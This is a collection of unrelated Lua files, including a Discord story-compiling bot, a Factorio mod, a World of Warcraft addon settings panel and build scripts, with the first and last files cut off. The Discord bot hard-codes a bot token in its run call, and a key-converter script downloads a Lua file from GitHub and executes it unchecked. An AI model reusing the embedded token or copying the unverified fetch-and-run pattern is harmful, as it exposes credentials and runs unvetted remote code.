local storyServer = client:getGuild(storyServerID)
print("Current server: ".. storyServer.name)
local storyText = getStoryText(storyChannel)
local newChapters = compileChapters(storyText, storyServer)
local myMessages = getMyMesssages(storyChannel)
if wipe == true then
wipeMyMessages(storyChannel, 1)
end
for nindex, newChapter in pairs(newChapters) do
local sendChapter = true
for mindex, message in pairs(myMessages) do
local newChapterTitle = trim(newChapter["fields"][1]["name"])
local newChapterContent = trim(newChapter["fields"][1]["value"])
local oldChapterTitle = trim(message.embed["fields"][1]["name"])
local oldChapterContent = trim(message.embed["fields"][1]["value"])
if newChapterTitle == oldChapterTitle then
print("Found a match for Chapter " .. nindex)
print(newChapterTitle .. ": " .. newChapterContent)
print(oldChapterTitle .. ": " .. oldChapterContent)
if newChapterContent ~= oldChapterContent then
message:delete()
else
sendChapter = false
end
end
end
if sendChapter == true and post == true then
storyChannel:send{embed = newChapter}
end
end
os.exit()
end)
function trim(s)
return (s:gsub("^%s*(.-)%s*$", "%1"))
end
function getMyMesssages(channel) --working on date sorting
local firstMessage = channel:getFirstMessage()
local lastMessage = channel:getLastMessage()
local messageHistory = {}
local myMessages = {}
while firstMessage ~= lastMessage do
local rawMessageHistory = channel:getMessagesBefore(lastMessage.id)
local tempIter = 1
for index, message in pairs(rawMessageHistory) do
messageHistory[tempIter] = message
tempIter = tempIter + 1
end
table.sort(messageHistory, function(m1, m2) return m1.createdAt < m2.createdAt end)
tempIter = 1
for index, message in pairs(messageHistory) do
if message.author == client.user then
myMessages[tempIter] = message
tempIter = tempIter + 1
end
end
lastMessage = messageHistory[1]
end
if channel:getLastMessage().author == client.user then
table.insert(myMessages, channel:getLastMessage())
end
table.sort(myMessages, function(m1, m2) return m1.createdAt < m2.createdAt end)
return myMessages
end
function wipeMyMessages(channel, cycles)
local repeats = cycles
while repeats > 0 do
local myMessages = getMyMesssages(channel)
channel:bulkDelete(myMessages)
sleep(5)
repeats = repeats - 1
end
end
-- sort messages by date
-- assemble into string, insert handlers
-- spit back out
function sleep(n)
os.execute("sleep " .. tonumber(n))
end
-- function getStoryChannel(server, channelID) -- select channel
-- for channel in server.TextChannels do
-- if channelID == channel.id then
-- break
-- end
-- end
function getStoryText(channel) -- index all messages in story channel
local firstMessage = channel:getFirstMessage()
local endOfChannel = false
local storyText = {}
while endOfChannel == false do
messageHistory = channel:getMessagesAfter(firstMessage.id) -- gets the first 100 messages in the channel
storyMessages = {firstMessage}
for id, message in pairs(messageHistory) do
table.insert(storyMessages, message)
end
table.sort(storyMessages, function(a,b) return a.createdAt < b.createdAt end) -- sort message by date / time
for index, message in pairs(storyMessages) do
local text = message.cleanContent
if text ~= nil and message.author.bot == false then
table.insert(storyText, trim(text))
end
end
if #storyMessages < 50 then
endOfChannel = true
break
else
firstMessage = storyMessages[#storyMessages]
end
sleep(1)
end
-- sort words by date
return storyText
end
function compileRawChapters(words)
-- check if the story is over 2000 characters yet
local rawChapters = {""}
local words = words
local currentChapter = 1
for index, word in pairs(words) do
if string.len(rawChapters[currentChapter]) + string.len(word) > charLimit == true then
currentChapter = currentChapter + 1
rawChapters[currentChapter] = ""
end
rawChapters[currentChapter] = rawChapters[currentChapter] .. " " .. word
end
return rawChapters
end
function compileChapters(words, server)
rawChapters = compileRawChapters(words)
chapters = {}
toBeContinuedText = "...𝓪𝓷𝓭 𝓽𝓱𝓮 𝓼𝓽𝓸𝓻𝔂 𝓬𝓸𝓷𝓽𝓲𝓷𝓾𝓮𝓼 𝓸𝓷!"
for index, chapter in pairs(rawChapters) do
local chapterEmbed = {
title = "𝔒𝔫𝔠𝔢 𝔲𝔭𝔬𝔫 𝔞 𝔱𝔦𝔪𝔢 𝔦𝔫 " .. server.name .. "..." ,
fields = {
{name = "𝒞𝒽𝒶𝓅𝓉𝑒𝓇 " .. index, value = chapter},
{name = toBeContinuedText, value = "** **"}
},
color = discordia.Color.fromRGB(114, 137, 218).value,
timestamp = discordia.Date():toISO('T', 'Z')
}
table.insert(chapters, chapterEmbed)
end
return chapters
end
client:run('Bot Nzk0ODUwNjU0ODAzODUzMzQz.X_A0Ww.xUd5J6OFhDw93WMpiWaDaylxj-A') |
-- inet addr tests
context("Inet addr check functions", function()
local ffi = require("ffi")
ffi.cdef[[
typedef struct rspamd_inet_addr_s rspamd_inet_addr_t;
bool rspamd_parse_inet_address (rspamd_inet_addr_t **target,
const char *src);
void rspamd_inet_address_freefree (rspamd_inet_addr_t *addr);
]]
test("Create inet addr from string", function()
local cases = {
{'192.168.1.1', true},
{'2a01:4f8:190:43b5::99', true},
{'256.1.1.1', false},
{'/tmp/socket', true},
{'./socket', true},
}
for _,c in ipairs(cases) do
local ip = ffi.new("rspamd_inet_addr_t* [1]");
local res = ffi.C.rspamd_parse_inet_address(ip, c[1])
assert_equal(res, c[2], "Expect " .. tostring(c[2]) .. " while parsing " .. c[1])
if res then
ffi.C.rspamd_inet_address_free(ip[0])
end
end
end)
end) |
-- RGBClock
local now = timetable(time(), _G.timezone, _G.dst)
local colors = {
{ 26, 188, 156}, -- 00:00
{ 46, 204, 113}, -- 01:00
{ 52, 152, 219}, -- 02:00
{155, 89, 182}, -- 03:00
{ 52, 73, 94}, -- 04:00
{243, 156, 18}, -- 05:00
{211, 84, 0}, -- 06:00
{192, 57, 43}, -- 07:00
{189, 195, 199}, -- 08:00
{127, 140, 141}, -- 09:00
{241, 196, 15}, -- 10:00
{236, 240, 241} -- 11:00
}
local color = colors[(now.hour % 12) + 1]
ws2812.write(2, string.char(color[2], color[1], color[3]))
|
--[[-
Maps key codes from 1.12 and before to those used by 1.13 and later.
Usage:
key-code-converter my_program
]]
if not fs.exists("old_keys.lua") then
local request = http.get("https://raw.githubusercontent.com/SquidDev-CC/CC-Tweaked/master/src/main/resources/assets/computercraft/lua/rom/apis/keys.lua")
if not request then error("Could not download keys", 0) end
local handle = fs.open("old_keys.lua", "w")
handle.write(request.readAll())
handle.close()
request.readAll()
end
local key_mapping, old_keys, new_keys = {}, {}, _G.keys
do
local env = setmetatable({}, { __index = _G })
loadfile("old_keys.lua", nil, env)()
for k, v in pairs(env) do old_keys[k] = v end
end
for name, code in pairs(new_keys) do
if type(code) == "number" then
key_mapping[code] = old_keys[name]
end
end
local co = coroutine.create(shell.execute)
local args = table.pack(...)
while true do
_G.keys = old_keys
local ok, result = coroutine.resume(co, table.unpack(args, 1, args.n))
_G.keys = new_keys
if not ok then printError(debug.traceback(co, result)) return end
if coroutine.status(co) == "dead" then return end
args = table.pack(coroutine.yield(result))
if args[1] == "key" or args[1] == "key_up" then
args[2] = key_mapping[args[2]] or args[2]
end
end
|
local ord={"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"}
local refOrder = {["1"] = "more-science-pack-01", ["2"] = "more-science-pack-02", ["3"] = "more-science-pack-03", ["4"] = "more-science-pack-04", ["5"] = "more-science-pack-05", ["6"] = "more-science-pack-06",
["7"] = "more-science-pack-07", ["8"] = "more-science-pack-08", ["09"] = "more-science-pack-09", ["10"] = "more-science-pack-10", ["11"] = "more-science-pack-11", ["12"] = "more-science-pack-12",
["13"] = "more-science-pack-13", ["14"] = "more-science-pack-14", ["15"] = "more-science-pack-15", ["16"] = "more-science-pack-16", ["17"] = "more-science-pack-17", ["18"] = "more-science-pack-18",
["19"] = "more-science-pack-19", ["20"] = "more-science-pack-20", ["21"] = "more-science-pack-21", ["22"] = "more-science-pack-22", ["23"] = "more-science-pack-23", ["24"] = "more-science-pack-24",
["25"] = "more-science-pack-25", ["26"] = "more-science-pack-26", ["27"] = "more-science-pack-27", ["28"] = "more-science-pack-28", ["29"] = "more-science-pack-29", ["30"] = "more-science-pack-30"}
local refPacks = {["1"] = "more-science-pack-1", ["2"] = "more-science-pack-2", ["3"] = "more-science-pack-3", ["4"] = "more-science-pack-4", ["5"] = "more-science-pack-5", ["6"] = "more-science-pack-6",
["7"] = "more-science-pack-7", ["8"] = "more-science-pack-8", ["9"] = "more-science-pack-9", ["10"] = "more-science-pack-10", ["11"] = "more-science-pack-11", ["12"] = "more-science-pack-12",
["13"] = "more-science-pack-13", ["14"] = "more-science-pack-14", ["15"] = "more-science-pack-15", ["16"] = "more-science-pack-16", ["17"] = "more-science-pack-17", ["18"] = "more-science-pack-18",
["19"] = "more-science-pack-19", ["20"] = "more-science-pack-20", ["21"] = "more-science-pack-21", ["22"] = "more-science-pack-22", ["23"] = "more-science-pack-23", ["24"] = "more-science-pack-24",
["25"] = "more-science-pack-25", ["26"] = "more-science-pack-26", ["27"] = "more-science-pack-27", ["28"] = "more-science-pack-28", ["29"] = "more-science-pack-29", ["30"] = "more-science-pack-30"}
local refBaseResult = {["1"] = data.raw["recipe"]["more-science-pack-1"].result_count, ["2"] = data.raw["recipe"]["more-science-pack-2"].result_count, ["3"] = data.raw["recipe"]["more-science-pack-3"].result_count,
["4"] = data.raw["recipe"]["more-science-pack-4"].result_count, ["5"] = data.raw["recipe"]["more-science-pack-5"].result_count, ["6"] = data.raw["recipe"]["more-science-pack-6"].result_count,
["7"] = data.raw["recipe"]["more-science-pack-7"].result_count, ["8"] = data.raw["recipe"]["more-science-pack-8"].result_count, ["9"] = data.raw["recipe"]["more-science-pack-9"].result_count,
["10"] = data.raw["recipe"]["more-science-pack-10"].result_count, ["11"] = data.raw["recipe"]["more-science-pack-11"].result_count, ["12"] = data.raw["recipe"]["more-science-pack-12"].result_count,
["13"] = data.raw["recipe"]["more-science-pack-13"].result_count, ["14"] = data.raw["recipe"]["more-science-pack-14"].result_count, ["15"] = data.raw["recipe"]["more-science-pack-15"].result_count,
["16"] = data.raw["recipe"]["more-science-pack-16"].result_count, ["17"] = data.raw["recipe"]["more-science-pack-17"].result_count, ["18"] = data.raw["recipe"]["more-science-pack-18"].result_count,
["19"] = data.raw["recipe"]["more-science-pack-19"].result_count, ["20"] = data.raw["recipe"]["more-science-pack-20"].result_count, ["21"] = data.raw["recipe"]["more-science-pack-21"].result_count,
["22"] = data.raw["recipe"]["more-science-pack-22"].result_count, ["23"] = data.raw["recipe"]["more-science-pack-23"].result_count, ["24"] = data.raw["recipe"]["more-science-pack-24"].result_count,
["25"] = data.raw["recipe"]["more-science-pack-25"].result_count, ["26"] = data.raw["recipe"]["more-science-pack-26"].result_count, ["27"] = data.raw["recipe"]["more-science-pack-27"].result_count,
["28"] = data.raw["recipe"]["more-science-pack-28"].result_count, ["29"] = data.raw["recipe"]["more-science-pack-29"].result_count, ["30"] = data.raw["recipe"]["more-science-pack-30"].result_count}
local baseCost = "200"
local resultCostMultiplier = "37"
if mods["AllAboutMoney"] then
if settings.startup["moresciencepack-EconomicsIntegration"].value == true then
--new subgroup for spending coins for science packs. PACKS CANNOT BE SOLD!!!!!, i'll maybe change this later to a config option to sell something like space science packs. who knows.... this is the first edition of the economics-route method.
data:extend(
{
{
type = "item-subgroup",
name = "spent8",
group = "money-buy",
order = "h"
}
})
for i=1,30 do
if settings.startup["MSP-pack".. i .. "-result"].value > 0 then --pack has not been disabled by user, allow purchase using coins.
data:extend(
{
{
type = "recipe",
name = "buy-MSPpack"..i,
icon = "__MoreSciencePacks-for1_1__/graphics/icons/more-science-pack-"..i..".png",
icon_size = 32,
order = refOrder[tostring(i)],
enabled = true,
subgroup = "spent8",
energy_required = 1,
ingredients ={{"coin", resultCostMultiplier * refBaseResult[tostring(i)] + baseCost},
},result = "more-science-pack-"..i,result_count = math.floor(refBaseResult[tostring(i)])},
})
end
end
end
end
--omni.lib.replace_recipe_ingredient(recipe, ingredient,replacement)
--omni.lib.add_recipe_ingredient(recipe, ingredient)
--morescience.recipe.add_ingredient(recipe, ingredient)
if mods["omnilib"] then --and mods["angelspetrochem"] then
--pack26. Advanced Chemistry
if data.raw.fluid["gas-epichlorhydrin"] then
omni.lib.replace_recipe_ingredient("more-science-pack-26", "heavy-oil", "gas-epichlorhydrin")
end
if mods["omnimatter_crystal"] and data.raw.fluid["hydromnic-acid"] then
omni.lib.replace_recipe_ingredient("more-science-pack-26", "sulfuric-acid", "hydromnic-acid")
end
--pack27. Advanced Weapony
if data.raw.ammo["ap-bullet-magazine"] then omni.lib.add_recipe_ingredient("more-science-pack-27", "ap-bullet-magazine") end
if data.raw.item["rocket-turret-mk2"] then omni.lib.add_recipe_ingredient("more-science-pack-27", "rocket-turret-mk2") end
end
if mods["bobwarfare"] then
--bobmods.lib.recipe.replace_ingredient(recipe, old, new)
--if data.raw.ammo["bob-rocket"] then bobmods.lib.recipe.replace_ingredient("science-pack-27", "explosive-rocket", "bob-rocket") end
end
|
local _, core = ...;
local _G = _G;
local MonDKP = core.MonDKP;
local L = core.L;
function MonDKP:DKPModes_Misc()
local f = core.ModesWindow.DKPModesMisc;
f.AutoAwardContainer = MonDKP:CreateContainer(f, "AutoAwardContainer", L["AUTOAWARD"])
f.AutoAwardContainer:SetPoint("TOPLEFT", f, "TOPLEFT", 40, -40)
f.AutoAwardContainer:SetSize(175, 50)
-- AutoAward DKP Checkbox
f.AutoAwardContainer.AutoAward = CreateFrame("CheckButton", nil, f.AutoAwardContainer, "UICheckButtonTemplate");
f.AutoAwardContainer.AutoAward:SetChecked(MonDKP_DB.modes.AutoAward)
f.AutoAwardContainer.AutoAward:SetScale(0.6);
f.AutoAwardContainer.AutoAward.text:SetText(" |cff5151de"..L["AUTOAWARD"].."|r");
f.AutoAwardContainer.AutoAward.text:SetScale(1.5);
f.AutoAwardContainer.AutoAward.text:SetFontObject("MonDKPSmallLeft")
f.AutoAwardContainer.AutoAward:SetPoint("TOPLEFT", f.AutoAwardContainer, "TOPLEFT", 10, -10);
f.AutoAwardContainer.AutoAward:SetScript("OnClick", function(self)
MonDKP_DB.modes.AutoAward = self:GetChecked();
if self:GetChecked() == false then
f.AutoAwardContainer.IncStandby:SetChecked(false)
MonDKP_DB.DKPBonus.AutoIncStandby = false;
end
PlaySound(808);
end)
f.AutoAwardContainer.AutoAward:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["AUTOAWARD"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["AUTOAWARDTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.AutoAwardContainer.AutoAward:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Include Standby Checkbox
f.AutoAwardContainer.IncStandby = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.AutoAwardContainer.IncStandby:SetChecked(MonDKP_DB.DKPBonus.AutoIncStandby)
f.AutoAwardContainer.IncStandby:SetScale(0.6);
f.AutoAwardContainer.IncStandby.text:SetText(" |cff5151de"..L["INCLUDESTANDBY"].."|r");
f.AutoAwardContainer.IncStandby.text:SetScale(1.5);
f.AutoAwardContainer.IncStandby.text:SetFontObject("MonDKPSmallLeft")
f.AutoAwardContainer.IncStandby:SetPoint("TOP", f.AutoAwardContainer.AutoAward, "BOTTOM", 0, 0);
f.AutoAwardContainer.IncStandby:SetScript("OnClick", function(self)
MonDKP_DB.DKPBonus.AutoIncStandby = self:GetChecked();
if self:GetChecked() == true then
f.AutoAwardContainer.AutoAward:SetChecked(true)
MonDKP_DB.modes.AutoAward = true;
end
PlaySound(808);
end)
f.AutoAwardContainer.IncStandby:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["INCLUDESTANDBY"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["INCLUDESBYTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:AddLine(L["INCLUDESBYTTWARN"], 1.0, 0, 0, true);
GameTooltip:Show();
end)
f.AutoAwardContainer.IncStandby:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Announce Highest Bidder Container
f.AnnounceBidContainer = MonDKP:CreateContainer(f, "AnnounceBidContainer", L["HIGHESTBID"])
f.AnnounceBidContainer:SetPoint("TOPRIGHT", f, "TOPRIGHT", -50, -40)
f.AnnounceBidContainer:SetSize(175, 70)
-- Announce Highest Bid
f.AnnounceBidContainer.AnnounceBid = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.AnnounceBidContainer.AnnounceBid:SetChecked(MonDKP_DB.modes.AnnounceBid)
f.AnnounceBidContainer.AnnounceBid:SetScale(0.6);
f.AnnounceBidContainer.AnnounceBid.text:SetText(" |cff5151de"..L["ANNOUNCEBID"].."|r");
f.AnnounceBidContainer.AnnounceBid.text:SetScale(1.5);
f.AnnounceBidContainer.AnnounceBid.text:SetFontObject("MonDKPSmallLeft")
f.AnnounceBidContainer.AnnounceBid:SetPoint("TOPLEFT", f.AnnounceBidContainer, "TOPLEFT", 10, -10);
f.AnnounceBidContainer.AnnounceBid:SetScript("OnClick", function(self)
MonDKP_DB.modes.AnnounceBid = self:GetChecked();
if self:GetChecked() == false then
f.AnnounceBidContainer.AnnounceBidName:SetChecked(false)
MonDKP_DB.modes.AnnounceBidName = false;
end
PlaySound(808);
end)
f.AnnounceBidContainer.AnnounceBid:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["ANNOUNCEBID"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["ANNOUNCEBIDTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.AnnounceBidContainer.AnnounceBid:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Include Name Announce Highest Bid
f.AnnounceBidContainer.AnnounceBidName = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.AnnounceBidContainer.AnnounceBidName:SetChecked(MonDKP_DB.modes.AnnounceBidName)
f.AnnounceBidContainer.AnnounceBidName:SetScale(0.6);
f.AnnounceBidContainer.AnnounceBidName.text:SetText(" |cff5151de"..L["INCLUDENAME"].."|r");
f.AnnounceBidContainer.AnnounceBidName.text:SetScale(1.5);
f.AnnounceBidContainer.AnnounceBidName.text:SetFontObject("MonDKPSmallLeft")
f.AnnounceBidContainer.AnnounceBidName:SetPoint("TOP", f.AnnounceBidContainer.AnnounceBid, "BOTTOM", 0, 0);
f.AnnounceBidContainer.AnnounceBidName:SetScript("OnClick", function(self)
MonDKP_DB.modes.AnnounceBidName = self:GetChecked();
if self:GetChecked() == true then
f.AnnounceBidContainer.AnnounceBid:SetChecked(true)
MonDKP_DB.modes.AnnounceBid = true;
end
PlaySound(808);
end)
f.AnnounceBidContainer.AnnounceBidName:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["INCLUDENAME"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["INCLUDENAMETTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.AnnounceBidContainer.AnnounceBidName:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Decline lower bids
f.AnnounceBidContainer.DeclineLowerBids = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.AnnounceBidContainer.DeclineLowerBids:SetChecked(MonDKP_DB.modes.DeclineLowerBids)
f.AnnounceBidContainer.DeclineLowerBids:SetScale(0.6);
f.AnnounceBidContainer.DeclineLowerBids.text:SetText(" |cff5151de"..L["DECLINELOWBIDS"].."|r");
f.AnnounceBidContainer.DeclineLowerBids.text:SetScale(1.5);
f.AnnounceBidContainer.DeclineLowerBids.text:SetFontObject("MonDKPSmallLeft")
f.AnnounceBidContainer.DeclineLowerBids:SetPoint("TOP", f.AnnounceBidContainer.AnnounceBidName, "BOTTOM", 0, 0);
f.AnnounceBidContainer.DeclineLowerBids:SetScript("OnClick", function(self)
MonDKP_DB.modes.DeclineLowerBids = self:GetChecked();
end)
f.AnnounceBidContainer.DeclineLowerBids:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["DECLINELOWBIDS"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["DECLINELOWBIDSTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.AnnounceBidContainer.DeclineLowerBids:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
--Misc Options Container
f.MiscContainer = MonDKP:CreateContainer(f, "MiscContainer", L["MISCSETTINGS"])
f.MiscContainer:SetPoint("TOPLEFT", f.AutoAwardContainer, "BOTTOMLEFT", 0, -20)
f.MiscContainer:SetSize(175, 90)
-- Standby On Boss Kill Checkbox
f.MiscContainer.Standby = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.MiscContainer.Standby:SetChecked(MonDKP_DB.modes.StandbyOptIn)
f.MiscContainer.Standby:SetScale(0.6);
f.MiscContainer.Standby.text:SetText(" |cff5151de"..L["STANDBYOPTIN"].."|r");
f.MiscContainer.Standby.text:SetScale(1.5);
f.MiscContainer.Standby.text:SetFontObject("MonDKPSmallLeft")
f.MiscContainer.Standby:SetPoint("TOPLEFT", f.MiscContainer, "TOPLEFT", 10, -10);
f.MiscContainer.Standby:SetScript("OnClick", function(self)
MonDKP_DB.modes.StandbyOptIn = self:GetChecked();
PlaySound(808);
end)
f.MiscContainer.Standby:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["STANDBYOPTIN"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["STANDBYOPTINTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:AddLine(L["STANDBYOPTINTTWARN"], 1.0, 0, 0, true);
GameTooltip:Show();
end)
f.MiscContainer.Standby:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Announce Award to Guild
f.MiscContainer.AnnounceAward = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.MiscContainer.AnnounceAward:SetChecked(MonDKP_DB.modes.AnnounceAward)
f.MiscContainer.AnnounceAward:SetScale(0.6);
f.MiscContainer.AnnounceAward.text:SetText(" |cff5151de"..L["ANNOUNCEAWARD"].."|r");
f.MiscContainer.AnnounceAward.text:SetScale(1.5);
f.MiscContainer.AnnounceAward.text:SetFontObject("MonDKPSmallLeft")
f.MiscContainer.AnnounceAward:SetPoint("TOP", f.MiscContainer.Standby, "BOTTOM", 0, 0);
f.MiscContainer.AnnounceAward:SetScript("OnClick", function(self)
MonDKP_DB.modes.AnnounceAward = self:GetChecked();
PlaySound(808);
end)
f.MiscContainer.AnnounceAward:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["ANNOUNCEAWARD"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["ANNOUNCEAWARDTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.MiscContainer.AnnounceAward:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Broadcast Bid Table to Raid
f.MiscContainer.BroadcastBids = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.MiscContainer.BroadcastBids:SetChecked(MonDKP_DB.modes.BroadcastBids)
f.MiscContainer.BroadcastBids:SetScale(0.6);
f.MiscContainer.BroadcastBids.text:SetText(" |cff5151de"..L["BROADCASTBIDS"].."|r");
f.MiscContainer.BroadcastBids.text:SetScale(1.5);
f.MiscContainer.BroadcastBids.text:SetFontObject("MonDKPSmallLeft")
f.MiscContainer.BroadcastBids:SetPoint("TOP", f.MiscContainer.AnnounceAward, "BOTTOM", 0, 0);
f.MiscContainer.BroadcastBids:SetScript("OnClick", function(self)
MonDKP_DB.modes.BroadcastBids = self:GetChecked();
PlaySound(808);
end)
f.MiscContainer.BroadcastBids:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["BROADCASTBIDS"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["BROADCASTBIDSTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.MiscContainer.BroadcastBids:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Log Bids/Rolls
f.MiscContainer.StoreBids = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.MiscContainer.StoreBids:SetChecked(MonDKP_DB.modes.StoreBids)
f.MiscContainer.StoreBids:SetScale(0.6);
f.MiscContainer.StoreBids.text:SetText(" |cff5151de"..L["LOGBIDS"].."|r");
f.MiscContainer.StoreBids.text:SetScale(1.5);
f.MiscContainer.StoreBids.text:SetFontObject("MonDKPSmallLeft")
f.MiscContainer.StoreBids:SetPoint("TOP", f.MiscContainer.BroadcastBids, "BOTTOM", 0, 0);
f.MiscContainer.StoreBids:SetScript("OnClick", function(self)
MonDKP_DB.modes.StoreBids = self:GetChecked();
PlaySound(808);
end)
f.MiscContainer.StoreBids:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["LOGBIDS"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["LOGBIDSTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.MiscContainer.StoreBids:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
--DKP Award Options Container
f.DKPAwardContainer = MonDKP:CreateContainer(f, "DKPAwardContainer", L["DKPSETTINGS"])
f.DKPAwardContainer:SetPoint("TOPLEFT", f.AnnounceBidContainer, "BOTTOMLEFT", 0, -20)
f.DKPAwardContainer:SetSize(175, 50)
-- Online Only Checkbox
if MonDKP_DB.modes.OnlineOnly == nil then MonDKP_DB.modes.OnlineOnly = false end
f.DKPAwardContainer.OnlineOnly = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.DKPAwardContainer.OnlineOnly:SetChecked(MonDKP_DB.modes.OnlineOnly)
f.DKPAwardContainer.OnlineOnly:SetScale(0.6);
f.DKPAwardContainer.OnlineOnly.text:SetText(" |cff5151de"..L["ONLINEONLY"].."|r");
f.DKPAwardContainer.OnlineOnly.text:SetScale(1.5);
f.DKPAwardContainer.OnlineOnly.text:SetFontObject("MonDKPSmallLeft")
f.DKPAwardContainer.OnlineOnly:SetPoint("TOPLEFT", f.DKPAwardContainer, "TOPLEFT", 10, -10);
f.DKPAwardContainer.OnlineOnly:SetScript("OnClick", function(self)
MonDKP_DB.modes.OnlineOnly = self:GetChecked();
PlaySound(808);
end)
f.DKPAwardContainer.OnlineOnly:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["ONLINEONLY"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["ONLINEONLYTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.DKPAwardContainer.OnlineOnly:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
-- Same Zone Only Checkbox
if MonDKP_DB.modes.SameZoneOnly == nil then MonDKP_DB.modes.SameZoneOnly = false end
f.DKPAwardContainer.SameZoneOnly = CreateFrame("CheckButton", nil, f, "UICheckButtonTemplate");
f.DKPAwardContainer.SameZoneOnly:SetChecked(MonDKP_DB.modes.SameZoneOnly)
f.DKPAwardContainer.SameZoneOnly:SetScale(0.6);
f.DKPAwardContainer.SameZoneOnly.text:SetText(" |cff5151de"..L["INZONEONLY"].."|r");
f.DKPAwardContainer.SameZoneOnly.text:SetScale(1.5);
f.DKPAwardContainer.SameZoneOnly.text:SetFontObject("MonDKPSmallLeft")
f.DKPAwardContainer.SameZoneOnly:SetPoint("TOP", f.DKPAwardContainer.OnlineOnly, "BOTTOM", 0, 0);
f.DKPAwardContainer.SameZoneOnly:SetScript("OnClick", function(self)
MonDKP_DB.modes.SameZoneOnly = self:GetChecked();
PlaySound(808);
end)
f.DKPAwardContainer.SameZoneOnly:SetScript("OnEnter", function(self)
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["INZONEONLY"], 0.25, 0.75, 0.90, 1, true);
GameTooltip:AddLine(L["INZONEONLYTTDESC"], 1.0, 1.0, 1.0, true);
GameTooltip:Show();
end)
f.DKPAwardContainer.SameZoneOnly:SetScript("OnLeave", function(self)
GameTooltip:Hide()
end)
end |
dofile("../../tools/premake/options.lua")
dofile("../../tools/premake/globals.lua")
link_cmd = ""
build_cmd = ""
if platform_dir == "osx" then
xcodebuildsettings {
["MACOSX_DEPLOYMENT_TARGET"] = "10.13"
}
end
solution "bullet_build"
location ("build/" .. platform_dir )
configurations { "Debug", "Release" }
-- Project
project "bullet_monolithic"
setup_env()
location ("build\\" .. platform_dir)
kind "StaticLib"
language "C++"
includedirs
{
"src\\",
}
if _ACTION == "vs2017" or _ACTION == "vs2015" or ACTION == "vs2019" then
systemversion(windows_sdk_version())
disablewarnings { "4267", "4305", "4244" }
end
setup_env()
files
{
"src\\Bullet3Collision\\**.*",
"src\\Bullet3Common\\**.*",
"src\\Bullet3Dynamics\\**.*",
"src\\Bullet3Geometry\\**.*",
"src\\Bullet3Serialize\\**.*",
"src\\BulletDynamics\\**.*",
"src\\BulletCollision\\**.*",
"src\\LinearMath\\**.*",
}
includedirs { "include" }
configuration "Debug"
defines { "DEBUG" }
entrypoint "WinMainCRTStartup"
linkoptions { link_cmd }
buildoptions { build_cmd }
symbols "On"
targetdir ("lib/" .. platform_dir)
targetname "bullet_monolithic_d"
configuration "Release"
defines { "NDEBUG" }
entrypoint "WinMainCRTStartup"
optimize "Speed"
linkoptions { link_cmd }
buildoptions { build_cmd }
targetdir ("lib/" .. platform_dir)
targetname "bullet_monolithic"
|
-- Prosody IM
-- Copyright (C) 2008-2010 Matthew Wild
-- Copyright (C) 2008-2010 Waqas Hussain
--
-- This project is MIT/X11 licensed. Please see the
